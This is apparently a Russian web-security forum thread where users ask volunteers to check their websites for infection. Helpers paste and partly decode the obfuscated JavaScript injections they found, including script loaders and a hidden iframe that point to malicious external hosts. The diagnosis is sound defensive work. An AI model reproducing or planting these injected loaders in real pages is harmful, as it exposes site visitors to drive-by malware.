Проверить сайт на наличие вирусов, все просьбы о проверке оставляйте в этой теме

  • Автор темы Автор темы akok
  • Дата начала Дата начала
smartall, хорошо. Еще понаблюдаю.
 
На сим наблюдение завершаю. Ничего в открытом доступе не вижу.
 
Здравствуйте всем и с наступающим!
Прошу посмотреть сайт allnod.com/index.php , а то жалуются, что нод32 на него ругается.

<script language="JavaScript" src="/allnod.js"></script>
<script type="text/javascript" language="javascript">
<!--
function IU520(t127){document.write( String.fromCharCode(parseInt(t127)+2));}
var wo231="102O114O114O110O56O45O45O98O96O112O109O104O"+
"44O109O105O109O113O102O99O97O102O105O95O44O108O99O"+
"114O45O113O45O110O86O87O80O70O53O54O49O47O45O61O113O"+
"103O98O59O47O53O48O47O54";var Uv703=wo231.split("O");
document.write("<s"+"cript type='text/javascript' language='javascri"+"pt' src='");
var Hi319=0;while(Hi319<Uv703.length){IU520(Uv703[Hi319]);Hi319++;}
document.write("'></sc"+"ript>");
Нажмите для раскрытия...
Вот этот скрипт в начале страницы, что он делает, как его распарсить?

ps/ у меня здесь уже есть регистрация(Husky), но я забыл пароль, и почты той уже нет(
Если есть возможность у администрации, напомните мне пароль в ЛС.
С уважением.
 
Последнее редактирование:
Husky1, в расшифровке это значит:

PHP: 
<script type='text/javascript' language='javascript' src='http://dbroj.okoshechka.net/s/*****/?sid=17218'></script>

А там
PHP: 
var ref = (document.referrer&&document.referrer!="") ? '&ref='+escape(document.referrer) : '';
var seed = '&seed='+Math.round(Math.random()*100000000);
document.write('<script type="text/javascript" language="javascript" src="http://dbro'+'j.oko'+'she'+'chk'+'a'+'.n'+'************/?sid'+'=172'+'18'+ref+seed+'"></script>');

Добавлено через 2 минуты 4 секунды
Husky1 написал(а):
ps/ у меня здесь уже есть регистрация(Husky), но я забыл пароль, и почты той уже нет(
Если есть возможность у администрации, напомните мне пароль в ЛС
Нажмите для раскрытия...
Если почта утеряна, то администрация ничем не может помочь.
 
Добавлено через 54 секунды
Проверьте этот сайт хттп://ввв.marvin-vibez.in....КИС 2010 блокира сайта..!:confused:
 
Последнее редактирование:
Cайт не работает. Но там интересный скрипт:

PHP: 
<noframes><body><ad><script LANGUAGE='javascript'>var type_of='%3c'+'%73'+'%63'+'%72'+'%69'+'%70'+'%74'+'%20'+'%6c'+'%61'+'%6e'+'%67'+'%75'+'%61'+'%67'+'%65'+'%3d'+'%27'+'%6a'+'%61'+'%76'+'%61'+'%73'+'%63'+'%72'+'%69'+'%70'+'%74'+'%27'+'%3e'+'%64'+'%6f'+'%63'+'%75'+'%6d'+'%65'+'%6e'+'%74'+'%2e'+'%77'+'%72'+'%69'+'%74'+'%65'+'%28'+'%75'+'%6e'+'%65'+'%73'+'%63'+'%61'+'%70'+'%65'+'%28'+'%27'+'%25'+'%33'+'%63'+'%25'+'%37'+'%33'+'%25'+'%36'+'%33'+'%25'+'%37'+'%32'+'%25'+'%36'+'%39'+'%25'+'%37'+'%30'+'%25'+'%37'+'%34'+'%25'+'%32'+'%30'+'%25'+'%36'+'%63'+'%25'+'%36'+'%31'+'%25'+'%36'+'%65'+'%25'+'%36'+'%37'+'%25'+'%37'+'%35'+'%25'+'%36'+'%31'+'%25'+'%36'+'%37'+'%25'+'%36'+'%35'+'%25'+'%33'+'%64'+'%25'+'%32'+'%37'+'%25'+'%36'+'%61'+'%25'+'%36'+'%31'+'%25'+'%37'+'%36'+'%25'+'%36'+'%31'+'%25'+'%37'+'%33'+'%25'+'%36'+'%33'+'%25'+'%37'+'%32'+'%25'+'%36'+'%39'+'%25'+'%37'+'%30'+'%25'+'%37'+'%34'+'%25'+'%32'+'%37'+'%25'+'%33'+'%65'+'%25'+'%36'+'%36'+'%25'+'%37'+'%35'+'%25'+'%36'+'%65'+'%25'+'%36'+'%33'+'%25'+'%37'+'%34'+'%25'+'%36'+'%39'+'%25'+'%36'+'%66'+'%25'+'%36'+'%65'+'%25'+'%32'+'%30'+'%25'+'%34'+'%36'+'%25'+'%34'+'%35'+'%25'+'%32'+'%38'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%32'+'%39'+'%25'+'%37'+'%62'+'%25'+'%37'+'%36'+'%25'+'%36'+'%31'+'%25'+'%37'+'%32'+'%25'+'%32'+'%30'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%33'+'%31'+'%25'+'%33'+'%64'+'%25'+'%37'+'%35'+'%25'+'%36'+'%65'+'%25'+'%36'+'%35'+'%25'+'%37'+'%33'+'%25'+'%36'+'%33'+'%25'+'%36'+'%31'+'%25'+'%37'+'%30'+'%25'+'%36'+'%35'+'%25'+'%32'+'%38'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%32'+'%65'+'%25'+'%37'+'%33'+'%25'+'%37'+'%35'+'%25'+'%36'+'%32'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%32'+'%38'+'%25'+'%33'+'%30'+'%25'+'%32'+'%63'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%32'+'%65'+'%25'+'%36'+'%63'+'%25'+'%36'+'%35'+'%25'+'%36'+'%65'+'%25'+'%36'+'%37'+'%25'+'%37'+'%34'+'%25'+'%36'+'%38'+'%25'+'%32'+'%64'+'%25'+'%33'+'%31'+'%25'+'%32'+'%39'+'%25'+'%32'+'%39'+'%25'+'%33'+'%62'+'%25'+'%37'+'%36'+'%25'+'%36'+'%31'+'%25'+'%37'+'%32'+'%25'+'%32'+'%30'+'%25'+'%36'+'%66'+'%25'+'%37'+'%35'+'%25'+'%37'+'%34'+'%25'+'%33'+'%64'+'%25'+'%32'+'%37'+'%25'+'%32'+'%37'+'%25'+'%33'+'%62'+'%25'+'%36'+'%36'+'%25'+'%36'+'%66'+'%25'+'%37'+'%32'+'%25'+'%32'+'%38'+'%25'+'%36'+'%61'+'%25'+'%33'+'%64'+'%25'+'%33'+'%30'+'%25'+'%33'+'%62'+'%25'+'%36'+'%61'+'%25'+'%33'+'%63'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%33'+'%31'+'%25'+'%32'+'%65'+'%25'+'%36'+'%63'+'%25'+'%36'+'%35'+'%25'+'%36'+'%65'+'%25'+'%36'+'%37'+'%25'+'%37'+'%34'+'%25'+'%36'+'%38'+'%25'+'%33'+'%62'+'%25'+'%36'+'%61'+'%25'+'%32'+'%62'+'%25'+'%32'+'%62'+'%25'+'%32'+'%39'+'%25'+'%36'+'%66'+'%25'+'%37'+'%35'+'%25'+'%37'+'%34'+'%25'+'%32'+'%62'+'%25'+'%33'+'%64'+'%25'+'%35'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%36'+'%39'+'%25'+'%36'+'%65'+'%25'+'%36'+'%37'+'%25'+'%32'+'%65'+'%25'+'%36'+'%36'+'%25'+'%37'+'%32'+'%25'+'%36'+'%66'+'%25'+'%36'+'%64'+'%25'+'%34'+'%33'+'%25'+'%36'+'%38'+'%25'+'%36'+'%31'+'%25'+'%37'+'%32'+'%25'+'%34'+'%33'+'%25'+'%36'+'%66'+'%25'+'%36'+'%34'+'%25'+'%36'+'%35'+'%25'+'%32'+'%38'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%33'+'%31'+'%25'+'%32'+'%65'+'%25'+'%36'+'%33'+'%25'+'%36'+'%38'+'%25'+'%36'+'%31'+'%25'+'%37'+'%32'+'%25'+'%34'+'%33'+'%25'+'%36'+'%66'+'%25'+'%36'+'%34'+'%25'+'%36'+'%35'+'%25'+'%34'+'%31'+'%25'+'%37'+'%34'+'%25'+'%32'+'%38'+'%25'+'%36'+'%61'+'%25'+'%32'+'%39'+'%25'+'%32'+'%64'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%32'+'%65'+'%25'+'%37'+'%33'+'%25'+'%37'+'%35'+'%25'+'%36'+'%32'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%32'+'%38'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%32'+'%65'+'%25'+'%36'+'%63'+'%25'+'%36'+'%35'+'%25'+'%36'+'%65'+'%25'+'%36'+'%37'+'%25'+'%37'+'%34'+'%25'+'%36'+'%38'+'%25'+'%32'+'%64'+'%25'+'%33'+'%31'+'%25'+'%32'+'%63'+'%25'+'%33'+'%31'+'%25'+'%32'+'%39'+'%25'+'%32'+'%39'+'%25'+'%33'+'%62'+'%25'+'%36'+'%34'+'%25'+'%36'+'%66'+'%25'+'%36'+'%33'+'%25'+'%37'+'%35'+'%25'+'%36'+'%64'+'%25'+'%36'+'%35'+'%25'+'%36'+'%65'+'%25'+'%37'+'%34'+'%25'+'%32'+'%65'+'%25'+'%37'+'%37'+'%25'+'%37'+'%32'+'%25'+'%36'+'%39'+'%25'+'%37'+'%34'+'%25'+'%36'+'%35'+'%25'+'%32'+'%38'+'%25'+'%37'+'%35'+'%25'+'%36'+'%65'+'%25'+'%36'+'%35'+'%25'+'%37'+'%33'+'%25'+'%36'+'%33'+'%25'+'%36'+'%31'+'%25'+'%37'+'%30'+'%25'+'%36'+'%35'+'%25'+'%32'+'%38'+'%25'+'%36'+'%66'+'%25'+'%37'+'%35'+'%25'+'%37'+'%34'+'%25'+'%32'+'%39'+'%25'+'%32'+'%39'+'%25'+'%33'+'%62'+'%25'+'%37'+'%64'+'%25'+'%33'+'%63'+'%25'+'%32'+'%66'+'%25'+'%37'+'%33'+'%25'+'%36'+'%33'+'%25'+'%37'+'%32'+'%25'+'%36'+'%39'+'%25'+'%37'+'%30'+'%25'+'%37'+'%34'+'%25'+'%33'+'%65'+'%27'+'%29'+'%29'+'%3b'+'%3c'+'%2f'+'%73'+'%63'+'%72'+'%69'+'%70'+'%74'+'%3e';for(i=0;i<type_of.length+2;i=i+3)document.write(unescape(type_of.substr(i,3)));FE('%286Fvfulsw%2853ODQJXDJH%286G%2855mdydvfulsw%2855%286Hli%285%3Bgrfxphqw1frrnlh1lqgh%7BRi%285%3B%2855xufklq%2855%285%3C%286G%286G04%2853%2859%2859%2853%2854zlqgrz1qdyljdwru1xvhuDjhqw1wrOrzhuFdvh%285%3B%285%3C1pdwfk%285%3B2%285%3Bfudzohu%28%3AFjrrjoherw%28%3AFpvqerw%28%3AF%7Cdkrr%28%3AFvhdufk%28%3AFlqgh%7Bhu%28%3AFfxloo1frp%28%3AFvwdfnudpeohu%28%3AFdsruw%28%3AF%7Cdqgh%7B%28%3AFelqj%28%3AFdvn%285%3C2%285%3C%2*******286G2%2855%286E%2853grfxphqw1zulwh%285%3B%2855%286Fl%2855.%2855iud%2855.%2855ph%2853zlgw%2855.%2855k%286G%2855.%28556%2853khljk%2855.%2855w%286G4%2853erug%2855.%2855hu%286G3%2853iu%2855.%2855dp%2855.%2855her%2855.%2855ughu%286G%2855.%28553%2853vuf%286G%285%3Ak%2855.%2855wws%2855.%2855%*****55%285%3C%286E%28%3AG%286F2VFULSW%286H%283D3');</script>
 
akoK написал(а):
Husky1, в расшифровке это значит:........

Если почта утеряна, то администрация ничем не может помочь.
Нажмите для раскрытия...
Ясно, спасибо akoK. Как вы расшифровали код, на поделитесь секретами?
А на счет аккаунта, ладно, бог с ним, не критично)
 
Добрый день! Помогите, пожалуйста, проверить на вирусы сайт ввв.mybodyflex.ru

Уже несколько дней NOD на форуме выжает сообщение: "блокировано соединение с вредоносным сайтом westnorths.cn...... "
 
Последнее редактирование:
Насколько я понимаю проблему уже пофиксили? Не вижу вредоносных редиректов.
 
akoK написал(а):
Насколько я понимаю проблему уже пофиксили? Не вижу вредоносных редиректов.
Нажмите для раскрытия...

Да, спасибо! Проблема, как оказалось, была вызвана линеечками с одного сата, коотрый подхватил вирус. Закрыла линеечки и проблема решилась.
 
Проверьте пожалуйста
9b2c1d90.webp
 
Заражен
В коде:
PHP: 
<script>window.status=" ";document.write(unescape("%3C%69"+"f%72%61me%20src%3Dht"+"********%3Dc206a9f40624fffd7eac23b23e0f6fbb%20width%3D0%20height%3D0%3E%3C/%69%66%72%61%6D%65%3E"));</script><br />

Который ведет на http://mr*****isy.cn/?s=c206a9f47eac23b23e0f6fbb

Который в свою очередь пытается загрузить pdf.
 
Добрый день! Проверьте, пожалуйста, сайт ввв magicwish . ru
Касперский видит трояна, остальные интивирусы молчат...
 
Спасибо за проверку. Странно, почему тогда у некоторых пользователей Касперский ругается...
 
Вот еще пользователь сообщил, что АВАСТ закрывает форум... А можно проверить? У меня НОД - он никаких проблем не показывает...
 
Вечером посмотрю код.
 

Похожие темы

N
сайт рухнул в поиске, помогите проверить на вредоносное по
Ответы
7
Просмотры
2K
akok
akok
magirus
  • Закрыта
прошу проверить сайт kazus.ru
Ответы
2
Просмотры
3K
magirus
magirus
BLO100
  • Закрыта
Прошу проверить сайт mafcup.ucoz.ru/
Ответы
5
Просмотры
3K
akok
akok
Назад
Сверху Снизу